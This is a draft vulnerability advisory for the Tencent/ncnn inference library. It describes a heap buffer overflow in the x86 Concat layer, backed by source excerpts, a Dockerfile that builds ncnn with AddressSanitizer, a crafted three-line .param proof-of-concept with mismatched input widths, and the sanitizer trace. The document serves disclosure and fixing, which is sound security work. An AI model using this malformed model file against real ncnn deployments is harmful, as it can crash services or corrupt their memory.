All advisories
Draft

Heap Buffer Overflow In x86 Concat

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow In x86 Concat

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/concat_x86.cpp:729 in Concat_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

A .param file whose Concat layer joins tensors of differing widths along the height axis makes the x86 concat implementation copy each input using its own width into an output that was sized from the first input's width, writing past the end of the heap allocation. Any process that runs the model reaches the bug; the supplied PoC feeds the file to ncnnoptimize, which executes the layer during ModelWriter::shape_inference(). The overflow is a memcpy of attacker-chosen length into a heap buffer, which crashes the process under ASan and corrupts adjacent heap memory otherwise.

Detail

The untrusted fields are the widths of the blobs feeding Concat, which come straight from the Input layers in the parameter file, plus the Concat axis (parameter id 0). Concat::load_param() performs no cross-input shape consistency check, and neither does the x86 forward path.

In the height-interleave branch, the output extent w is taken from bottom_blobs[0] alone, and only the heights are summed. The per-input copy length is then recomputed from that input's w:

// src/layer/x86/concat_x86.cpp:694
        int w = bottom_blobs[0].w;
        int d = bottom_blobs[0].d;
        int channels = bottom_blobs[0].c;
        size_t elemsize = bottom_blobs[0].elemsize;
        int elempack = bottom_blobs[0].elempack;

        // total height
        int top_h = 0;
        for (size_t b = 0; b < bottom_blobs.size(); b++)
        {
            const Mat& bottom_blob = bottom_blobs[b];
            top_h += bottom_blob.h;
        }

        Mat& top_blob = top_blobs[0];
        top_blob.create(w, top_h, d, channels, elemsize, elempack, opt.blob_allocator);
// src/layer/x86/concat_x86.cpp:726
                    int size = bottom_blob.w * bottom_blob.h;

                    const float* ptr = bottom_blob.channel(q).depth(i);
                    memcpy(outptr, ptr, size * elemsize);

The PoC declares two 3-D inputs, a with w=1, h=1, c=1 and b with w=100, h=1, c=1, concatenated on axis 1. top_h becomes 2 and the output is created as 1 x 2 x 1 x 1 floats — 8 bytes of payload, which ASan reports as an 84-byte region once alignment, the reference count and ncnn's over-read padding are added.

The first iteration copies 1 * 1 * 4 bytes and advances outptr by one float. The second iteration computes size = 100 * 1 and issues a 400-byte memcpy starting 4 bytes into the allocation, so it runs 396 bytes past the end. ASan reports the WRITE of size 400 landing exactly at the end of the region.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-x86-concat && cd ncnn-poc-heap-buffer-overflow-in-x86-concat

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
3 3
Input a 0 1 a 0=1 1=1 2=1
Input b 0 1 b 0=100 1=1 2=1
Concat c 2 1 a b out 0=1
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000154 at pc 0x7abd0d2f6303 bp 0x7ffe87231a80 sp 0x7ffe87231228
WRITE of size 400 at 0x50e000000154 thread T0
    #0 0x7abd0d2f6302 in memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115
    #1 0x630b3911df36 in ncnn::Concat_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/concat_x86_avx512.cpp:729
    #2 0x630b38fcf70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #3 0x630b38fb7b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x630b390179e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x630b38ea93c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x630b38f26eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x7abd0cc7e1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x7abd0cc7e28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x630b38ea6624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
    #0 0x7abd0d2f7f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x630b38f3b68e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x630b38f3b68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x630b38f7c2f4 in ncnn::Mat::create(int, int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:623
    #4 0x630b3911b5cc in ncnn::Concat_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/concat_x86_avx512.cpp:709
    #5 0x630b38fcf70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #6 0x630b38fb7b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x630b390179e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x630b38ea93c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x630b38f26eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x7abd0cc7e1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x7abd0cc7e28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x630b38ea6624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115 in memcpy

Credit

Zheng Yu @ DepthFirst